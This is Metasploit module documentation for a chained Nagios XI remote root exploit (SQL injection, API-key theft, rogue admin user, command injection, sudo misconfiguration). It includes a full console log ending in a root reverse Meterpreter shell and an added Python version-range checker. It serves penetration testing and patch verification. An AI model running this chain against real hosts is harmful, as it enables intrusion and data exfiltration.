metasploit-gs/documentation/modules/exploit/linux/http/nagios_xi.md

Vulnerable Application

Nagios XI 5.2.7 - 5.4.12 Chained Remote Root RCE

This exploit combines many different vulnerabilities in Nagios XI to gain remote root access to the affected host. The process is:

  1. Reset the database user to root.
  2. Exploit SQL injection to extract API keys.
  3. Use an API key to add an administrative user.
  4. Authenticate to the application using the newly added user.
  5. Exploit command injection and a sudo misconfiguration to get a remote root shell.
  6. Remove the added admin user and reset the database user.
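The affected range above (5.2.7 through 5.4.12) is the first thing a defender checks. This is an added helper, not part of the module or its documentation: it pulls a dotted version out of a free-form string (for example the banner or a scanner line) and compares it numerically, because a plain string comparison would wrongly rank "5.4.12" below "5.4.2".

```python
import re

# Affected range as stated in the module documentation (inclusive).
VULN_MIN = (5, 2, 7)
VULN_MAX = (5, 4, 12)

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Extract the first major.minor.patch triple from `text` as an int tuple.

    Returns None when no dotted version is present. Tuples compare
    element-wise, so (5, 4, 12) > (5, 4, 2), unlike the string forms.
    """
    match = _VERSION_RE.search(text)
    if match is None:
        return None
    return tuple(int(part) for part in match.groups())


def is_vulnerable(text):
    """True if the Nagios XI version found in `text` falls in the affected range.

    Raises ValueError when no version can be parsed, so callers never treat
    an unknown version as safe by accident.
    """
    version = parse_version(text)
    if version is None:
        raise ValueError("no version string found in: %r" % text)
    return VULN_MIN <= version <= VULN_MAX


if __name__ == "__main__":
    # Constructed sample inputs: an inventory note and a raw banner.
    for sample in ("Nagios XI 5.3.0 (monitoring-01)", "5.4.13", "5.2.6"):
        print(sample, "->", "affected" if is_vulnerable(sample) else "not affected")
```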

See our blog post for more information.

Verification Steps

  1. use exploit/linux/http/nagios_xi
  2. set lhost [IP]
  3. set rhost [IP]
  4. exploit
  5. A Meterpreter session should have been opened successfully.

Scenarios

Nagios 5.2.7 on CentOS 6.7

msf > use exploit/linux/http/nagios_xi

msf exploit(nagios_xi) > set LHOST 15.0.0.181
LHOST => 15.0.0.181
msf exploit(nagios_xi) > set RHOST 10.20.1.194
RHOST => 10.20.1.194
msf exploit(nagios_xi) > exploit

[*] Started reverse TCP handler on 15.0.0.181:4444 
[*] STEP 0: Get Nagios XI version string.
[+] STEP 0: Found Nagios XI version: 5.3.0
[*] STEP 1: Setting Nagios XI DB user to root.
[*] STEP 1: Received a 302 Response. That's good!
[*] STEP 2: Exploiting SQLi to extract user API keys.
[*] STEP 2: Received a 302 Response. That's good!
[*] Found 1 unique api keys
[*] 67e52c8b387b0d17cb94b66788adaa40
[*] STEP 3: Using API Keys to add an administrative user...
[*] STEP 3: trying to add admin user with key 67e52c8b387b0d17cb94b66788adaa40
[+] Added user:aYJupLthTjZnwSQb password:heuOsZJMjwUYFpit userid:3
[*] STEP 4.1: Authenticate as user aYJupLthTjZnwSQb with password heuOsZJMjwUYFpit
[*] STEP 4.1: Get NSP and nagiosxi for login..
[*] STEP 4.1: login_nsp 1c52b832891f65d961e69d0db9a583f88c1dddcf637d37405c88d70a5371fe77 
[*] STEP 4.1: login_nagiosxi 5kk73vr4i3g6v1d5ekg2mtgd26
[*] STEP 4.2: Authenticating...
[*] STEP 4.2: authed_nagiosxi 5kk73vr4i3g6v1d5ekg2mtgd26
[*] STEP 5.1: executing payload
[*] STEP 5.2: removing scripts from disc
[*] Command Stager progress - 100.00% done (701/701 bytes)
[*] STEP 6.1: Setting Nagios XI DB user to nagiosql.
[*] STEP 6.1: Received a 302 Response. That's good!
[*] STEP 6.2: deleting admin
[*] Sending stage (847604 bytes) to 10.20.1.194
[*] Meterpreter session 1 opened (15.0.0.181:4444 -> 10.20.1.194:35750) at 2018-04-26 17:36:22 -0400
[*] Be sure to run post/linux/gather/enum_nagios_xi to exfil all the data off this box!

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >